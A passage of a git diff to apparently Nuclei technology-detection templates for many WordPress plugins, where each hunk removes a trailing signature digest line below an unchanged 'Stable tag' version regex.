a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100adfbd1042319bf7e36e8ab115658433e5261993f6e75c278fdfb494a0f4abd0502204fe822c9af51736e6b4af7969a790caffaa2dfbbf5e4f1575b9b4ca0a885d9ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 5531a4300c..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ecc80d54aa830253c80546726a1332980982e66e42390a459b53fe3eda4f66bf02210083cf5dbff1250b0b4f51781932f6d7027eb0584a95e0e45e9abbf6e437a94909:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 5b5ff630c9..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062069d2987933188de9a9a8e6455c4c5a60dc552fc7d7a4d3d34fc4c140cb22a02200ada083919532ffef289838de85d5ae015c8b309b78ac83cde6e7956cff0623a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6592014d32..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220049ffa6422cb891f764c0d52c44ae06270d3f8423fc4cc9e1d0bab8ff6fbf0f602200929e97825b287604485d930d0284c342c0fbdf90b7cd9c68fc41cfaf14c1e68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index e5be1ddefe..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206154dc3c6f92b239eed0b0701fd9e36e538f28a712793313f795f952cbb59b7a02200cffa7340cb1a3ff9f19d1afb76ec7e6704597b170f1245c86a2a2b7f3866778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 76509d5262..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da8c9d1d7f88a7cdc23d2a4ea7cfd6ec0f2daa89d70a0086dfac8f447b7fa0a502201225bce939529ae9fe6392d6d9c2c68498c173e7399cc5ec08a38bb448d4aa34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index badff81381..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100abac73b2b0a0609c6bbb46c99f5c5cc0672c602ab0d143caae9b96a1786637a2022049b088fda427a142c764464895a1c4264a2e68bfcdeeab7243ed49272c6949ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 3789d19638..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022048a44ef44cb17b1f67c1a381bc1d6a078107137fa6bb509973ab727a09047af802202d2d087dea6d8718312963cc72dd25cc24fe54a3b37c329b9ca7f4bf44cb6e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 95be077f72..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061dc49775c3b8d2de3fea0367332b3191fdb5a3fbb084ff61fa1cb9b9c4dcbc6022041dcf927d33e107d162176814d0d6bbaf00a7783d18badc6a159cb28a000e312:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index be1f124c70..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022077e2e87c8a0c122fb19371461a5ae673ab1fa7fa588781aaec0cdd1f8604eb1902210080784d8ff8fcb67b51ea4a3498557a7a1e3fa2fb3ba2c767e6fcf652168a5bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 892ce5c1a0..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b69cb75e42c131a0cd68955e6ff5ce2953404091fb474980eda7bb54f5d56057022100c1eeab18f30a900eb5aa51c94a9c831474e668367eea47657f3d1efea1fd19c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index be944dc8e2..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220628d97c8012917da8de04b68cb5bf2c2a3e6d531847c5ee8c0b3c14dc6fc1f31022019806cc37aabe5bac3bc4911330ad8aa0324ab3d23b3674aa7ba6808906e2fda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 510e88fe83..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec8393bd6dd7859c64d655368cc82bf45206aa7f2e5a7b3e1f149cc03ce1ff2a02207b988ccd613bafcae0b838e404be0d4ffe2029723a95e25013042c050acc4612:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 97346129e6..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f796b8c4a66c15d61e009045fac4ac87d0d01b19515fcbc81fc9adf639e2391f022100d85dafb79777c35413110db2fd9bf406d2916b5c128a2e346a7bcdff39a09c4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 6c56c4bbd9..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cdec07242f7661a65262266e0d98e073935605b9a55c2a184912715cd9ef941e022100e004e264c724acdb520f70325089ece76595b6e97d69b9161bb42da43908e768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index a23d8fbdb9..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207eb2d3842aebca462adc08f07b91f54fe2371760da90ec512f9a89997f4e2352022100a42d9e17c9a8112e707bbec3231c10cda860bbb4bc2b81685925b665ae6913d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 310d8d2db2..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb1702eb47a7f958c4975a672cbf0b8613b8df39cb71f5ba2590ea7fea7b5adf022100f08cb86e358445b18fa771f634e282b3b073887c84a01de4b877f6f82f163c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 02e202de6c..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b30cb1259de30e434b251c58f4ca59c997890b9cd1986f7bc3c879b5b411d708022041d2849f8f66bf1462d177e1742350c3c4b27972bc119cdc19b1e8e922307e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index f11d6ef0ea..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0b64acc15c2f14ab89bd6a18e02bed0a9067208e6881b28f267980207d001eb02202aef7c0ea2409f232c762c536d1e9fbc81f4e9dec5f285f03b459a9b017d024c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 5a9714525d..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207069111ecb14d63216ee0d436215d010f37082c16fec6f0382501bdac69dedaa022100c02b701906eadd1f1b033b8b603eacc866079e678c3d5e6c54b5e7e33de93f24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 3cb7d07409..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba250a087dc05645fcbd8eb9d0c79f0f83269c614ef7bc940d5c66f96606c37e022100a2c29b556f1a8fd784f2afa6fffefea68da93df58c391f256c6e4b7c406b42af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 7e2a7634b7..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200ff868f8b0f9c872557ffe2afe34b495b495b4d22eb71eaeb313e1d9e500a1ac022100f13da99960d0f33b893a1609d3bb90268c80d5ae6ed63ad7e7d6e6525f93e021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index f8e1551ddd..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220647da1b00c7009de7827fa6ed33dc54aa826dc64cc1150e478dc7965e1538870022100bb14f58ca0c40789518009c84fd14d3fcf2dcd2f8c354ee6b793e04f445febc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index f36ad26566..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202b33f35b433716d58583e72b9807ac12b2ee07228af9a317181130d527dc709e022100cc674cf026699d3ad0ad91965e6159ebbba314a20d9196d5210beaf4a12c5725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 77bcb11b82..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207787452bd296e61d18b42d3089fa9c1c81c5e107c5e77a84897d462f67a61a24022100ab4002acfa499c02c30ced6d788052214e50d63abab36733f2a78e1aad6b093d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index df801e6e6a..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203750fdbd98d62af6447e9204b3500f828f54620219f4ab1e13b09f398f7ee9e30220766c36fa21f156344ecfd333054b13bcaed2736319cf5f4a516e4f298dcc4079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 818cb1083e..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f5c53eddaca98b364f36d91bb409740e9c5a4a0ce9486e0a20dbc1e8c0325f67022100d05b7dd0452a0559a02d371bf1d366f3fc85a23b6213ae1d310cf40b3c86e6dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 4d0ce76387..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203239b8d133ecb24b145d2055a5bc71ff78a0c89607b5ad0763bfa63a09dfba26022100be5f754a6fd1507dbc274758aae97acd5ea22617889fb1a44dd7bb695842377d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 3d11cd45be..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3fba8973fd39cdcfb583b35e5f437874272f1f594be5ff967999db4fe80e46c0221009208070128ecd727d86409a72813b5dcd83da53028ba06f1a94f4ef39557d86d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5d0f0d310f..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e5413955244f81bacdfd9cba73bbcdea44522e99cee5373b6087144a6afe558022007db72e7c1da2a9469efaf15b23b0e0725a4ce8fb0850a0f305510d96e060ee5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 232a2dadb8..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e3724cc06f369606d139aa86429e2bf9c15a4706d696a2b99653b76eb3ae1615022100a2fc893c95cee944ef8167bb499852f4dae242c5a3c17affc74084cae163efca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 1e57ae35d4..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206098cfa3b2da69fbf9b44d2eabafbbcfb68ea1f53558921524a14befc6ad5b2902200a75bf26ac52ea3adb390c575367c404e8fa15347ce929aa1421b2dfd1f63e57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 5a0ad10f59..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022036da6792e21b2ab3b5ca9da130dd9b237f66c8af35779dd18bea44fc09e5fff60220407549548a7dcda3f67cdf0be8b82c927fd2a906a7e02e4378833d0b3041a0e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index e95bfb6367..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220648d8c91b08beb833db9ddf0db64d9238488a9c629662cd7725a341f937001df0220536d913f406673b8ba78954925a54381b10dc31f280a96f253b05c7f425f3edb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 038655a822..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2003464da67d48cdb6fb9721c0ff522b1accce0db70db48f8001c84dca059a1022100a5610b1dd7dbac013eebec31b818bd09e166ba75ee66d4e2233b03c0ce6fde84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 39f4690312..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bebdfb8eb748ae33df8b71e908b90e1bc639a9204f896be2bc5a53777de16221022025a26bd4b526971190253eb0539f9acd5d8b3b64174e9e15c86ae4fd3c95dcfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 3710192a55..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220404bd9eb167d4f95f616abff5db427ee638342b1b1dd283681376feffd3b10890221009b87a404190e63dd0574fdb472a00e4574dcb17ba72ba3d856aceb162592bcfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 2ed95a1869..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220137f19795c83b5d7cbb383bd45105bdfcd4421fd79d7a76c81d3375780a5e820022100ef1ae6acceb7310252f4304029364eebee893b0e57a24c1e8e7f8fd42691793f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 95e7da49e5..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b2f7f46288a4c090346567ee75c76ecf476984cd74b3a15dea50b6e9411bdf202200d4551c9bd0ebc9ef955c655f8aee864fa411323aa9fcbaee44aad14e8fc985f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 6d72ef49db..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200483e574ab6cf2683ac3422c1dba850233f4ecf7581ccb4143d08b7750f6ac7002201e4eda6c21657b5f59a6518faa5f3c5f2e23cf07e61640113a6dda0a24ea5f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 14f265331e..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207539a66d6e1238cd88af8144ff44058512ff89d9e05c123c104336c1cf172a00022100fd9fad5412d50531be3df6b751562dd1d18b2bd43ffbaf330ecf3788d28a3215:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index fac4892ebb..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b203365b6dfb46038491960e0781a8b4dc62d07da3bfe8e84039b1768ffa7120220299a23ae7729d037b9f5d1d5bc03e4d818a3b03c917c2f59c9aa8557b37a1f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 6b4e65f6a1..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c07863326aa916e73bedb2064b315acb5cdb6687abc75f687bdeba181509b83d022100bc7bb50684c6c0abda951faf689cfddcd9deb1e96ece56c0c0d1b6eb6270a0d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0ee284d075..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205babd3a8d55ce8ce73a34c1e0ccc3cdf56bb968c1820f51cf5a5313147ce61b3022100ac4b5107bd2261551f9577947d72eba04824ed80c2f61e843c7da99e29505fc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index b396b33c61..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a76b60e193dfdd790aaa81dba716ae437aed776d737f3611c14ba514fbd43e39022100e38e5306935d73450e3cab853902f00981162adecda13558712f710b59800ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 6e93e702d7..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220218faf10b04b49ddc9dddbfb01b481f84b22777f50f38ad79b0aa952153f86490221009371dba2e2bea99f65b96b1cda3ddec120cc787b83e58b2b58d3ef537968772f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 89a94d77b7..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 